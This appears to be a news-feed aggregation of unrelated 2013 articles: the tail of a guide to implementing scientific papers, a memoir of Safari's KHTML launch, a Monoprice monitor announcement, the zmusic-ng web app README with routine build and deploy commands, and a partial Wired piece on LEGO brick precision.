Some research group that is just following the work of the groundbreaking teams, proposing improvements to it, and publishing their results of the improvements. Many of these papers lack proper statistical analysis and wrongly conclude that the improvements are really beating the original algorithm. Most of the time, they really are not bringing anything except for unnecessary additional complexity. But not all copycats are bad. Some are good, but it’s rare.

2.3 – The garbage paper

Some researchers really don’t know what they are doing and/or are evil. They just try to maintain their status and privileges in the academic institution at which they teach. So they need funding, and for that they need to publish, something, anything. The honest ones will tell you in the conclusion that they failed and that the results are accurate only N% of the time (with N being a bad value). But some evil ones will lie, and say that their research was a great success. After some time reading publications, it becomes easy to spot the garbage paper and ditch them.

3 – How to read a scientific paper

A lot has already been written on the topic, so I am not going to write much about it. A good starting point is: How to Read a Paper by Srinivasan Keshav. Below are a few points that I found useful while I was reading scientific publications.

3.1 – Find the right paper

What you want to implement is an original paper, one that started a whole domain. It is sometimes okay to pick a copycat paper, if you feel that it brings real improvements and consistency to a good but immature groundbreaking paper.

So let’s say you have a paper as your starting point. You need to do some research in its surroundings. For that, the strategy is to look for related publications, and for the publications being listed in the “References” section at the end of the paper. Go on Google Scholar and search for the titles and the authors. Does any of the papers you found do a better job than the paper you had originally? If yes, then just ditch the paper you were looking at in the first place, and keep the new one you found. Another cool feature of Google Scholar is that you can find papers that cite a given paper. This is really great, because all you have to do is to follow the chain of citations from one paper to the next, and you will find the most recent papers in the field. Finding the good paper from a starting point is all about looking for papers being cited by the current paper, and for papers citing the current paper. By moving back and forth in time you should find the paper that is both of high quality and fits your needs.

Important: note that at this stage of simple exploration and reckoning, you should not be reading and fully understand the papers. This search for the right paper should be done just by skimming over the papers and using your instinct to detect the garbage (this comes with experience).

3.2 – Do not read on the screen

Print the publication on hard paper and read the paper version. Also, do not reduce the size in order to print more on each page. Yes, you will save three sheets of paper, but you will lose time as you will get tired faster reading these tiny characters. Good font size for reading is between 11 and 13 points.

3.3 – Good timing and location

Do not read a paper in the middle of the night, do it at a moment of the day when your brain is still fresh. Also, find a quiet area, and use good lighting. When I read, I have a desk lamp pointing directly at the document.

3.4 – Marker and notes

Highlight the important information with a marker, and take notes in the margin of whatever idea that pops in your head as you read.

3.5 – Know the definitions of all the terms

When you are used to read mostly news articles and fiction, your brain is trained to fill-in meaning for words that you do not know, by using context as a deduction device. Reading scientific publications is a different exercise, and one of the biggest mistake is to assume false meaning for a word. For instance in this sentence “The results of this segmentation approach still suffer from blurring artifacts”. Here two words, “segmentation”, and “artifacts”, have a general meaning in English, but also have a particular meaning in the domain of Computer Vision. If you do not know that these words have a particular meaning in this paper, then while reading without paying attention, your brain will fill-in the general meaning, and you might be missing some very important information. Therefore you must (i) avoid assumptions about words, and whenever in doubt look up the word in the context of the domain the publication was written, and (ii) write a glossary on a piece of paper of all the concepts and vocabulary specific to the publication that you did not know before. If you encounter for the first time concepts such as “faducial points” and “piece-wise affine transform”, then you should look-up their precise definitions and write them down in your glossary. Concepts are language-enabled brain shortcuts, and allow you to understand the intent of the authors faster.

3.6 – Look for statistical analysis in the conclusion

If the authors present only one curve from their algorithm and one curve from another algorithm, and say “look, it’s 20% more accurate”, then you know you’re reading garbage. What you want to read is: “Over a testing set of N instances, our algorithm shows significant improvement with a p-value of 5% using a two-sample t-test.” The use of statistical analysis shows a minimum of driving from the author, and is a good proof that the results can be trusted for generalization (unless the authors lied to make their results look more sexy, which can always happen).

3.7 – Make sure the conclusions are demonstrating that the paper is doing what you need

Let’s say you want an algorithm that can find any face in a picture. The authors of the paper say in the conclusion that their model was trained using 10 poses from 80 different people (10 x 80 = 800 pictures), and that the accuracy of face detection with the training set was 98%, but was only 70% with the testing set (picture not used during training). What does this mean? This means that apparently, the algorithm has issues to generalize properly. It performs well when used on the training set (which is useless), and perform worse when used in real-world cases. What you should conclude at this point is that maybe, this paper is not good enough for what you need.

3.8 – Pay attention to the input data used by the authors

If you want to perform face detection with a webcam, and the authors have used pictures taken with a high-definition camera, then there are chances that the algorithm will not perform as well in your case as it did for the authors. Make sure that the algorithm was tested on data similar to yours or you will end up with a great implementation that is completely unusable in your real-world setup.

3.9 – Authors are humans

The authors are humans, and therefore they make mistakes. Do not assume that the authors are absolutely right, and in case an equation is really hard to understand or follow, you should ask yourself whether or not the authors made a mistake there. This could just be a typo in the paper, or an error in the maths. Either case, the best way to find out is to roll out the equations yourself, and try to verify their results.

3.10 – Understand the variables and operators

The main task during the implementation of a publication is the translation of math equations in the paper into code and data. This means that before jumping into the code, you must understand 100% of the equations and processes on these equations. For instance, “C = A . B” could have different meaning. A and B could be simple numbers, and the “.” operator could simply be a product. In that case, C would be the product of two numbers A and B. But maybe that A and B are matrices, and that “.” represents the matrix product operator. In that case, C would be the product matrix of the matrices A and B. Yet another possibility is that A and B are matrices and that “.” is the term-by-term product operator. In that case, each element C(i,j) is the product of A(i,j) and B(i,j). Notations for variables and operators can change from one mathematical convention to another, and from one research group to another. Make sure you know what each variable is (scalar, vector, matrix or something else), and what every operator is doing on these variables.

3.11 – Understand the data flow

A paper is a succession of equations. Before you start coding, you must know how you will plug the output of equation N into the input of equation N+1.

4 – Prototyping

Once you have read and understood the paper, it’s time to create a prototype. This is a very important step and avoiding it can result in wasted time and resources. Implementing a complex algorithm in languages such as C, C++ or Java can be very time consuming. And even if you have some confidence in the paper and think the algorithm will work, there is still a chance that it won’t work at all. So you want to be able to code it as quickly as possible in the dirtiest way, just to check that it’s actually working.

4.1 – Prototyping solutions

The best solution for that is to use a higher level versatile language or environment such as Matlab, R, Octave or SciPy/NumPy. It is not that easy to represent a mathematical equation in C++ and then print the results to manually check them. On the contrary, it is extremely straightforward to write equations in Matlab, and then print them. What would take you two to three weeks in C++ will take take you two days in Matlab.

4.2 – Prototyping helps the debugging process

An advantage of having a prototype is that when you will have your C++ version, you will be able to debug by comparing the results between the Matlab prototype and the C++ implementation. This will be developed further in the “Debugging” section below.

4.3 – Wash-off implementation issues beforehand

You will certainly make software design mistakes in your prototype, and this is a good thing as you will be able to identify where are the difficulties with both the processes or data. When you will code the C++ version, you will know how to better architect the software, and you will produce way cleaner and more stable code than you would have without the prototyping step (this is the “throw-away system” idea presented by Frederick Brooks in The Mythical Man-Month).

4.4 – Verify the results presented in the paper

Read the “Experiment” section of the paper carefully, and try to reproduce the experimental conditions as closely as possible, by using test data as similar as possible to the ones used by the authors. This increases your chances of reproducing the results obtained by the authors. Not using similar conditions can lead you to a behavior of your implementation that you might consider as an error, whereas you are just not feeding it with the correct data. As soon as you can reproduce the results based on similar data, then you can start testing it on different kinds of data.

5 – Choose the right language and libraries

At this stage, you must have a clear understanding of the algorithm and concepts presented in the publication, and you must have a running prototype which convinces that the algorithm is actually working on the input data you wish to use in production. It is now time to go into the next step, which consists in implementing the publication with the language and framework that you wish to use in production.

5.1 – Pre-existing systems

Many times, the production language and libraries are being dictated by pre-existing systems. For instance, you have a set of algorithm for illumination normalization in a picture, in a library coded in Java, and you want to add a new algorithm from a publication. In that case, obviously, you are not going to code this new algorithm in C++, but in Java.

5.2 – Predicted future uses of the implementation

In the case there is no pre-existing system imposing you a language, then the choice of the language should be done based upon the predicted uses of the algorithm. For example, if you believe that within four to six months, a possible port of your application will be done to the iPhone, then you should choose C/C++ over Java as it would be the only way to easily integrate the code into an Objective-C application without having to start everything from scratch.

5.3 – Available libraries that solve fully or partly the algorithm

The available libraries in different languages can also orient the choice of the production language. Let’s imagine that the algorithm you wish to implement makes use of well-known algebra techniques such as principal component analysis (PCA) and singular value decomposition (SVD). Then you could either code PCA and SVD from scratch, and if there is a bug could end up debugging for a week, or you could re-use a library that already implements these techniques and write the code of your implementation using the convention and Matrix class of this library. Ideally, you should be able to decompose your implementation into sub-tasks, and try to find libraries that already implement as many of these sub-tasks as possible. If you find the perfect set of libraries that are only available for a given language, then you should pick that language. Also, note that the choice of libraries should be a trade-off between re-using existing code and minimizing dependencies. Yes, it is good to have code for every sub-task needed for your implementation, but if that requires to create dependencies over 20 different libraries, then it might be not very practical and can even endanger the future stability of your implementation.

6 – Implementation

Here are some tips from my experience in implementing publications

6.1 – Choose the right precision

The type you will use for your computation should be chosen carefully. It is generally way better to use double instead of float. The memory usage can be larger, but the precision in the calculation will greatly improve, and is generally worth it. Also, you should be aware of the differences between 32-bit and 64-bit systems. Whenever you can, create your own type to encapsulate the underlying type (float or double, 32-bit or 64-bit), and use this type in your code. This can be done with a define is C/C++ or a class in Java.

6.2 – Document everything

Although it is true that over-documenting can slow down a project dramatically, in the case of the implementation of a complex technical paper, you want to comment everything. Even if you are the only person working on the project, you should document your files, classes and methods. Pick a convention like Doxygen or reStructuredText, and stick to it. Later in the development, there will be a moment where you will forget how some class works, or how you implemented some method, and you will thank yourself for documenting the code!

6.3 – Add references to the paper in your code

For every equation from the paper that you implement, you need to add a comment citing the paper (authors and year) and either the paragraph number or the equation number. That way, when later re-reading the code, you will be able to connect directly the code to precise locations in the paper. These comments should look like:

// See Cootes et al., 2001, Equation 2.3
// See Matthews and Baker, 2004, Section 4.1.2

6.4 – Avoid mathematical notations in your variable names

Let’s say that some quantity in the algorithm is a matrix denoted A. Later, the algorithm requires the gradient of the matrix over the two dimensions, denoted dA = (dA/dx, dA/dy). Then the name of the the variables should not be “dA_dx” and “dA_dy”, but “gradient_x” and “gradient_y”. Similarly, if an equation system requires a convergence test, then the variables should not be “prev_dA_dx” and “dA_dx”, but “error_previous” and “error_current”. Always name things for what physical quantity they represent, not whatever letter notation the authors of the paper used (e.g. “gradient_x” and not “dA_dx”), and always express the more specific to the less specific from left to right (e.g. “gradient_x” and not “x_gradient”).

6.5 – Do not optimize during the first pass

Leave all the optimization for later. As you can never be absolutely certain which part of your code will require optimization. Every time you see a possible optimization, add a comment and explain in a couple of lines how the optimization should be implemented, such as:

// OPTIMIZE HERE: computing the matrix one column at a time
// and multiplying them directly could save memory

That way, you can later find all the locations in your code at which optimizations are possible, and you get fresh tips on how to optimize. Once your implementation will be done, you will be able to find where to optimize by running a profiler such as Valgrind or whatever is available in the programming language you use.

6.6 – Planning on creating an API?

If you plan on using your current code as a basis for an API that will grow with time, then you should be aware of techniques to create interfaces that are actually usable. For this, I would recommend the “coding against the library” technique, summarized by Joshua Bloch in his presentation How to Design a Good API and Why it Matters.

7 – Debugging

Implementing a new algorithm is like cooking a dish you never ate before. Even if it tastes kind of good, you will never know if this is what it was supposed to taste. Now we are lucky, since unlike for cooking, software development has some helpful trick to increase the confidence we have in an implementation.

7.1 – Compare results with other implementations

A good way to wash out the bugs is to compare the results of your code with the results of an existing implementation of the same algorithm. As I assume that you did correctly all the tasks in the “But before you jump” section presented above, you did not find any available implementation of the algorithm (or else you would have used it instead of implementing the paper!). As a consequence, the only other implementation that you have at this stage is the prototype that you programmed earlier.

The idea is therefore to compare the results of the prototype and the production implementation at every step of the algorithm. If the results are different, then one of the two implementations is doing something wrong, and you must find which and why. Precision can change (the prototype can give you x = 1.8966 and the production code x = 1.8965), and the comparison should of course take this into account.

7.2 – Talk with people who have read the paper

Once all the steps for both implementations (prototype and production) are giving the exact same results, you can gain some confidence that your code is bug free. However, there is still a risk that you made a mistake in your understanding of the paper. In that case, both implementations will give the same results for each step, and you will think that your implementations are good, whereas this just proves that both implementations are equally wrong. Unfortunately, there is no way that I know of to detect this kind of problems. Your best option is to find someone who has read the paper, and ask that person questions regarding the parts of the algorithm you are not sure about. You could even try to ask the authors, but your chances to get an answer are very low.

7.3 – Visualize your variables

While developing, it is always good to keep an eye on the content of the variables used by the algorithm. I am not talking about merely printing all the values in the matrices and data you have, but finding the visualization trick adapted to any variable in your implementation. For instance, if a matrix is suppose to represent the gradient of an image, then during the coding and debugging, you should have a window popping up and showing that gradient image, not just the number values in the image matrix. That way, you will associate actual an image with the data you are handling, and you will be capable of detecting when there is a problem with one of the variables, which in turn will indicate a possible bug. Inventive visualization tricks include images, scatter plots, graphs, or anything that is not just a stupid list of 1,000 numbers and upon which you can associate a mental image.

7.4 – Testing dataset

Generating data to experiment with your implementation can be very time consuming. Whenever you can, try to find databases (face database, text extract databases, etc.) or tools for generating such data. If there are none, then do not lose time generating 1000 samples manually. Code a quick data generator in 20 lines and get done with it.

Conclusion

In this article, I have presented good practices for the implementation of a scientific publication. Remember that these are only based on my personal experience, and that they should not be blindly followed word for word. Always pay attention when you read and code, and use your judgement to determine which of the guidelines presented above fit your project. Maybe some of the practices will hurt your project more than it will help it, and that’s up to you to find out.

Now go implement some cool algorithm!

References

How to Read a Paper by Srinivasan Keshav
How to Design a Good API and Why it Matters by Joshua Bloch
The Mythical Man-Month by Frederick Brooks
The 20 / 80 Productivity Rule by Emmanuel Goossaert
Google Scholar

Kickstarter

'(fwd) Greetings from the Safari team at Apple Computer' - MARC

Safari is released to the world

$
0
0

Comments:"Safari is released to the world"

URL:http://donmelton.com/2013/01/10/safari-is-released-to-the-world/


During the early development of Safari, I didn’t just worry about leaking our secret project through Apple’s IP address or our browser’s user agent string. It also concerned me that curious gawkers on the outside would notice who I was hiring at Apple.

Other than a bit part in a documentary about Netscape that aired on PBS, I wasn’t known to anyone but a few dozen other geeks in The Valley. Of course, several of those folks were aware I was now at Apple and working on some project I wouldn’t say anything about. And it doesn’t take many people in this town to snowball a bit of idle speculation.

I found out later that Andy Hertzfeld, an Apple veteran who I worked with at Eazel, had figured it all out by the time I showed up for my first day to work on the browser on June 25, 2001. Andy was very insightful that way. But thankfully he was also quiet about it at the time.

Hiring Darin Adler, also ex-Apple and ex-Eazel, in the Spring of 2002 was likely visible to others in the industry since he was much more well known than me. But because Darin had never worked on a dedicated Web browser like I had, no one made the connection.

However, when I hired Dave Hyatt in July 2002, then guesses started flying fast.

While at Netscape, Dave built the Chimera (now known as Camino) browser for Mac OS X and co-created the project that would later become Firefox. Both of these applications were based on the Mozilla Gecko layout engine on which Dave also worked. He was a true celebrity in the Web browser world, having his hands in just about every Mozilla project.

So, during the Summer of 2002, several bloggers and tech websites speculated that Dave must be bringing Chimera to the Mac. Except that Chimera was already a Mac application and didn’t need to be ported. So what the hell was Dave doing at Apple? Building another Gecko-based Mac browser? No one knew. And none of this made much sense. Which is probably why the rumors subsided so quickly.

But people would remember all of this when Safari debuted at Macworld in San Francisco on January 7, 2003. And at least one of them would remember it at full volume while Steve Jobs was on stage making that announcement.

Until I watched that video I found and posted of the Macworld keynote, I had completely forgotten what else was announced that day. Which is pretty sad considering I saw Steve rehearse the whole thing at least four times.

But you have to realize I was totally focused on Safari. And Scott Forstall, my boss, wanted me at those rehearsals in case something went wrong with it.

There’s nothing that can fill your underwear faster than seeing your product fail during a Steve Jobs demo.

One of my concerns at the time was network reliability. So, I brought Ken Kocienda, the first Safari engineer, with me to troubleshoot since he wrote so much of our networking code. If necessary, Ken could also diagnose and duct tape any other part of Safari too. He coined one of our team aphorisms, “If it doesn’t fit, you’re not shoving hard enough.”

Ken and I started at Apple on the same day so, technically, he’s the only original Safari team member I didn’t hire. But because we both worked at Eazel together, I knew that Ken was a world-class propellor-head and insisted Forstall assign him to my team — essentially a requirement for me taking the job.

Most of the time during those rehearsals, Ken and I had nothing to do except sit in the then empty audience and watch The Master Presenter at work — crafting his keynote. What a privilege to be a spectator during that process. At Apple, we were actually all students, not just spectators. When I see other companies clumsily announce products these days, I realize again how much the rest of the world lost now that Steve is gone.

At one rehearsal, Safari hung during Steve’s demo — unable to load any content. Before my pants could load any of its own, Ken discovered the entire network connection had failed. Nothing we could do. The IT folks fixed the problem quickly and set up a redundant system. But I still worried that it might happen again when it really mattered.

On the day of actual keynote, only a few of us from the Safari team were in the audience. Employee passes are always limited at these events for obvious reasons. But we did have great seats, just a few rows from the front — you didn’t want to be too close in case something really went wrong.

Steve started the Safari presentation with, “So, buckle up.” And that’s what I wished I could do then — seatbelt myself down. Then he defined one of our product goals as, “Speed. Speed.” So, I tensed up. Not that I didn’t agree, of course. I just knew what was coming soon:

Demo time.

And for the entire six minutes and 32 seconds that Steve used Safari on stage, I don’t remember taking a single breath. I was thinking about that network failure during rehearsal and screaming inside my head, “Stay online, stay online!” We only had one chance to make a first impression.

Of course, Steve, Safari and the network performed flawlessly. I shouldn’t have worried.

Then it was back to slides and Steve talking about how we built it. “We based Safari on an HTML rendering engine that is open source.” And right then is when everybody else remembered all those rumors from the Summer about Dave Hyatt bringing Chimera to Apple.

But I chose the engine we used — with my team’s and my management chain’s support, of course — a year before Dave joined the project. Dave thought it was a great decision too, once he arrived. But that engine wasn’t Gecko, the code inside Chimera.

It was KHTML. Specifically KHTML and KJS— the code inside KDE’s Konqueror Web browser on Linux. After the keynote was over, I sent this email to the KDE team to thank them and introduce ourselves. I did it right from where I was sitting too, once they turned the WiFi back on.

You can argue whether KHTML was the right decision — go ahead, after 10 years it doesn’t faze me anymore. I’ll detail my reasons in a later post. Spoiler alert: I don’t hate Gecko.

But back to Steve’s presentation.

Everyone was clapping that Apple embraced open source. Happy, happy, happy. And they were just certain what was coming next. Then Steve moved a new slide onto the screen. With only one word, “KHTML” — six-foot-high white letters on a blue background.

If you listen to that video I posted, notice that no one applauds here. Why? I’m guessing confusion and complete lack of recognition.

What you also can’t hear on the video is someone about 15 to 20 rows behind where we were sitting — obviously expecting the word “Gecko” up there — shout at what seemed like the top of his lungs:

“WHAT THE FUCK!?”

KHTML may have been a bigger surprise than Apple doing a browser at all. And that moment was glorious. We had punk’d the entire crowd.

CES 2013: Monoprice Announces 27-Inch 2560x1440 Monitor for $390 - Tested

$
0
0

Comments:"CES 2013: Monoprice Announces 27-Inch 2560x1440 Monitor for $390 - Tested"

URL:http://www.tested.com/tech/pcs/452766-monoprice-announces-27-inch-2560x1440-monitor-390/


The Samsungs, Sharps and Sonys of CES love to show off the best cutting-edge technology they have to offer. And cutting-edge technology is invariably expensive. 4K TVs ruled the show this year, but you won't see one in a store in 2013 for less than $12,000. Then there are vendors like Monoprice, who show up to CES with products that are A) Affordable and B) Worth using now, not five years in the future. The Internet's favorite source for cheap audio/video cables announced a new 27-inch monitor at CES that will compete with those increasingly popular Korean imports like the Yamakasi Catleap.

We've covered budget Korean monitors in-depth before--basically, some smart eBay shopping can net you a 27-inch 2560x1440 IPS monitor (with the same LG panels that Apple puts into its monitors) for $300 or $400. They're barebones, but the screens are beautiful. A few US retailers like Micro Center have started offering their own alternatives at similar bargain prices. Monoprice's new Crystal Pro comes in at $390.

Why buy from Monoprice instead of importing from Korea? It's all about the warranty. Monoprice offers a five dead pixel return policy, which isn't bad, and the monitor comes with a general three year warranty. If one of the Korean monitors breaks down, you're basically out of luck. Monoprice is a bit easier to reach.

The $390 monitor is back-ordered at Monoprice but should ship on March 2nd.

zmusic-ng - ZX2C4 Music web application that serves and transcodes tagged music libraries using Flask and Backbone.js.

$
0
0

Comments:"zmusic-ng - ZX2C4 Music web application that serves and transcodes tagged music libraries using Flask and Backbone.js."

URL:http://git.zx2c4.com/zmusic-ng/about/


ZX2C4 Music provides a web interface for playing and downloading music files using metadata.

Features

  • HTML5 <audio> support.
  • Transcodes unsupported formats on the fly.
  • Serves zip files of chosen songs on the fly.
  • Supports multiple formats: mp3, aac, ogg, webm, flac, musepack, wav, wma, and more.
  • Clean minimalistic design.
  • Handles very large directory trees.
  • Full metadata extraction.
  • Advanced search queries.
  • Statistics logging.
  • Simple RESTful JSON API design.
  • Integration with nginx's X-Accel-Redirect.
  • Supports multiple different database backends.
  • Can run stand-alone or with uwsgi/nginx.

Dependencies

Frontend

All frontend dependencies are included in the source.

Backend

All backend dependencies must be present on system.

Downloading

The source may be downloaded using git:

$ git clone http://git.zx2c4.com/zmusic-ng/

Building

The entire project is built using standard makefiles:

zmusic-ng $ make

The makefiles have the usual targets, such as clean and all, and some others discussed below. If the environment variable DEBUG is set to 1, js and css files are not minified.

Want to run the app immediately? Skip down to Running Standalone.

URLs and APIs

Frontend

GET /

The frontend interface supports query strings for controlling the initial state of the application. These query strings wil be replaced with proper HTML5 pushState in the near future. Accepted query string keys:

  • username and password: Automatically log in using provided credentials.
  • query: Initial search query. If unset, chooses a search at random from predefined (see below) list.
  • play: Integer (1-indexed) specifying which song in the list to autoplay. No song autoplays if not set.

Backend

The provided frontend uses the following API calls. Third parties might implement their own applications using this simple API. All API endpoints return JSON unless otherwise specified.

GET /query/<search query>

Queries server for music metadata. Each word is matched as a substring against the artist, album, and title of each song. Prefixes of artist:, album:, and title: can be used to match exact strings against the respective keys. * can be used as a wildcard when matches are exact. Posix shell-style quoting and escaping is honored. Example searches:

  • charles ming
  • changes mingus
  • artist:"Charles Mingus"
  • artist:charles*
  • artist:charles* album:"Changes Two"
  • goodbye pork artist:"Charles Mingus"

Requires logged in user. The query strings offset and limit may be used to limit the number of returned entries.

GET /song/<id>.<ext>

Returns the data in the music file specified by <id> in the format given by <ext>. <ext> may be the original format of the file, or mp3, ogg, webm, or wav. If a format is requested that is not the song's original, the server will transcode it. Use of original formats is thus preferred, to cut down on server load and to enable seeking using HTTP Content-Range.

Requires logged in user. The server will add the X-Content-Duration HTTP header containing the duration in seconds as a floating point number.

POST /login

Takes form parameters username and password. Returns whether or not login was successful.

GET /login

Returns whether or not user is currently logged in.

GET /logout

Logs user out. This request lacks proper CSRF protection. Requires logged in user.

GET /scan

Scans the library for new songs and extracts metadata. This request lacks proper CSRF protection. Requires logged in admin user.

GET /stats

Returns IP addresses and host names of all downloaders in time-order. Requires logged in admin user.

GET /stats/<ip>

Returns all downloads and song-plays from a given <ip> address in time-order. Requires logged in admin user.

Authentication

All end points that require a logged in user may use the cookie set by /login. Alternatively, the query strings username and password may be sent for a one-off authentication.

Configuration

Frontend

The frontend should be relatively straight forward to customize. Change the title of the project in frontend/index.html, and change the default randomly selected search queries in frontend/js/app.js. A more comprehensible configuration system might be implemented at some point, but these two tweaks are easy enough that for now it will suffice.

Backend

The backend is configured by modifying the entries in backend/app.cfg. Valid configuration options are:

  • SQLAlchemy keys: The keys listed on the Flask-SQLAlchemy configuration page, with SQLALCHEMY_DATABASE_URI being of particular note.
  • Flask keys: The keys listed on the Flask configuration page. Be sure to change SECRET_KEY and set DEBUG to False for deployment.
  • STATIC_PATH: The relative path of the frontend directory from the backend directory. The way this package is shipped, the default value of ../frontend is best.
  • MUSIC_PATH: The path of a directory tree containing music files you'd like to be served.
  • ACCEL_STATIC_PREFIX: By default False, but if set to a path, this path is used as a prefix for fetching static files via nginx's X-Accel-Redirect. nginx must be configured correctly for this to work.
  • ACCEL_MUSIC_PREFIX: By default False, but if set to a path, this path is used as a prefix for fetching music files via nginx's X-Accel-Redirect. nginx must be configured correctly for this to work.
  • MUSIC_USER and MUSIC_PASSWORD: The username and password of the user allowed to listen to music.
  • ADMIN_USER and ADMIN_PASSWORD: The username and password of the user allowed to scan MUSIC_PATH for new music and view logs and statistics.

Deployment

Running Standalone

By far the easiest way to run the application is standalone. Simply execute backend/local_server.py to start a local instance using the built-in Werkzeug server. This server is not meant for production. Be sure to configure the usernames and music directory first.

zmusic-ng $ backend/local_server.py
* Running on http://127.0.0.1:5000/
* Restarting with reloader

The collection may be scanned using the admin credentials:

zmusic-ng $ curl http://127.0.0.1:5000/scan?username=ADMIN_USER&password=ADMIN_PASSWORD

And then the site may be viewed in the browser:

zmusic-ng $ chromium http://127.0.0.1:5000/

The built-in debugging server cannot handle concurrent requests, unfortuantely. To more robustly serve standalone, read on to running standalone with uwsgi.

Running Standalone with uwsgi

The built-in Werkzeug server is really only for debugging, and cannot handle more than one request at a time. This means that, for example, one cannot listen to music and query for music at the same time. Fortunately, it is easy to use uwsgi without the more complicated nginx setup (described below) in a standalone mode:

zmusic-ng $ uwsgi --chdir backend/ -w zmusic:app --http-socket 0.0.0.0:5000

Depending on your distro, you may need to add --plugins python27 or similar.

Once the standalone server is running you can scan and browse using the URLs above.

Uploading Music

There is an additional makefile target called update-collection for uploading a local directory to a remote directory using rsync and running the metadata scanner using curl. Of course, uploading is not neccessary if running locally.

zmusic-ng $ make update-collection

The server.cfg configuration file controls the revelent paths for this command:

  • SERVER: The hostname of the remote server.
  • LOCAL_COLLECTION_PATH: The path of the music folder on the local system.
  • SERVER_COLLECTION_PATH: The destination path of the music folder on the remote system.
  • ADMIN_USERNAME and ADMIN_PASSWORD should be the same as those set in backend/app.cfg.

nginx / uwsgi

Deployment to nginx requires use of uwsgi. A sample configuration file can be found in backend/nginx.conf. Make note of the paths used for the /static/ and /music/ directories. These should be absolute paths to those specified in backend/app.cfg as STATIC_PATH and MUSIC_PATH.

uwsgi should be run with the -w zmusic:app switch, possibly using --chdir to change directory to the backend/ directory, if not already there.

For easy deployment, the makefile has some deployment targets, which are configured by the server.cfg configuration file. These keys should be set:

  • SERVER: The hostname of the deployed server.
  • SERVER_UPLOAD_PATH: A remote path where the default ssh user can write.
  • SERVER_DEPLOY_PATH: A remote path where the default ssh user cannot write, but where root can.

The upload target uploads relevent portions of the project to SERVER_UPLOAD_PATH. The deploy target first executes the upload target, then copies files from SERVER_UPLOAD_PATH to SERVER_DEPLOY_PATH with the proper permissions, and then finally restarts the uwsgi processes.

zmusig-ng $ make deploy

These makefile targets should be used with care, and the makefile itself should be inspected to ensure all commands are correct for custom configurations.

Here is what a full build and deployment looks like:

zx2c4@Thinkpad ~/Projects/zmusic-ng $ make deploy
make[1]: Entering directory `/home/zx2c4/Projects/zmusic-ng/frontend'
 JS js/lib/jquery.min.js
 JS js/lib/underscore.min.js
 JS js/lib/backbone.min.js
 JS js/models/ReferenceCountedModel.min.js
 JS js/models/Song.min.js
 JS js/models/SongList.min.js
 JS js/models/DownloadBasket.min.js
 JS js/views/SongRow.min.js
 JS js/views/SongTable.min.js
 JS js/views/DownloadSelector.min.js
 JS js/controls/AudioPlayer.min.js
 JS js/app.min.js
 CAT js/scripts.min.js
 CSS css/bootstrap.min.css
 CSS css/font-awesome.min.css
 CSS css/page.min.css
 CAT css/styles.min.css
make[1]: Leaving directory `/home/zx2c4/Projects/zmusic-ng/frontend'
 RSYNC music.zx2c4.com:zmusic-ng
 [clipped]
 DEPLOY music.zx2c4.com:/var/www/uwsgi/zmusic
+ umask 027
+ sudo rsync -rim --delete '--filter=P zmusic.db' zmusic-ng/ /var/www/uwsgi/zmusic
 [clipped]
+ sudo chown -R uwsgi:nginx /var/www/uwsgi/zmusic
+ sudo find /var/www/uwsgi/zmusic -type f -exec chmod 640 '{}' ';'
+ sudo find /var/www/uwsgi/zmusic -type d -exec chmod 750 '{}' ';'
+ sudo /etc/init.d/uwsgi.zmusic restart
 * Stopping uWSGI application zmusic ...
 * Starting uWSGI application zmusic ...

Bugs? Comments? Suggestions?

Send all feedback, including git-formatted patches, to Jason@zx2c4.com.

Disclaimer

The author does not condone or promote using this software for redistributing copyrighted works.

License

Copyright (C) 2013 Jason A. Donenfeld. All Rights Reserved.

This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.


Why Are LEGO Sets Expensive? | Wired Science | Wired.com

$
0
0

Comments:"Why Are LEGO Sets Expensive? | Wired Science | Wired.com"

URL:http://www.wired.com/wiredscience/2013/01/why-are-lego-sets-expensive/


I’m not sure I would say LEGO blocks are that expensive, but the statement is that they are expensive because they are so well made. Really, this has to at least be partially true. If you take some blocks made in 1970, they still fit with pieces made today. That is quite impressive.

But the real question is: what is the distribution of LEGO sizes? How does this distribution of sizes compare to other toys? The simple way to answer this question is to start measuring a whole bunch of blocks.

Here is the plan. Use a micrometer (the tool, not the unit) to measure the width of 2 bump LEGO blocks. Plot a histogram of the different sizes. Just to be clear, the micrometer is a tool that measures small sizes – around a millimeter to 20 millimeters. This particular one has markings down to 0.01 mm – for my measurements, I will estimate the size to 0.001 millimeters. Oh, one more point. There are lots of pieces that are two LEGO dots. For this data, I am mostly using 2 x 1 and 2 x 2 pieces. I will assume that both have the same size in the 2 bump direction.

Here is my first set of data.

These 88 measurements have an average of 15.814 mm with a standard deviation of 0.0265 mm.

What about older LEGO pieces?

Fortunately, I found one of my original sets from the late 70s.

v

I even have the instructions. Even though I’m not sure how old these are, they have to be at least 30 years old. Here are some 2 bump pieces from the 70s vs modern pieces.

The pieces from the 70s have an average of 15.819 mm with a standard deviation of 0.026 mm. Without doing any formal statistical tests, this seems close enough to being about the same distributions.

How about something else? What if I just look at 2 x 2 LEGO blocks? For these blocks, I can get a measurement of the width in two different ways (length and width). I can call one dimension “x” and the other “y”. Here is a plot of x vs. y measurements for square blocks.

Maybe that wasn’t such a great plot. What does it show? I guess the only thing I can say about this is that there doesn’t appear to be a systematic error relating the two sides of a 2 x 2 block. If a block is a tiny bit smaller in one dimension, it isn’t necessarily smaller in the other dimension.

What About Other Objects?

Do other things have high precision parts too? Before I show any data, let me plot some different data. Instead of plotting just the width of different objects, I am going to plot the distribution of the width divided by the mean width. This way I can make a comparison between objects of different size.

I found three different sets of objects to measure.

There are these wooden planks that are used for building stuff. Then I have two different types of “counting” blocks used for math stuff. I will combine all the 2 bump LEGO blocks together since they seem to be from a similar distribution.

Here is the distribution of the 4 different types of objects. I only plotted the 70s LEGO pieces since they had a number comparable to the other objects.

Clearly the wooden planks have a much wider distribution than the rest of the objects. Let me remove the wooden plank data and plot just the other stuff so it will be easier to make a comparison.

I probably need more data, but these seem to be built with around the same level of precision. Honestly, I don’t know much about plastic manufacturing – but the LEGO blocks appear to be created from harder plastic. Maybe this would lead them to maintain their size over a long period of time. Unfortunately, I didn’t have old math blocks to compare to newer blocks.

Price Per Piece of LEGO

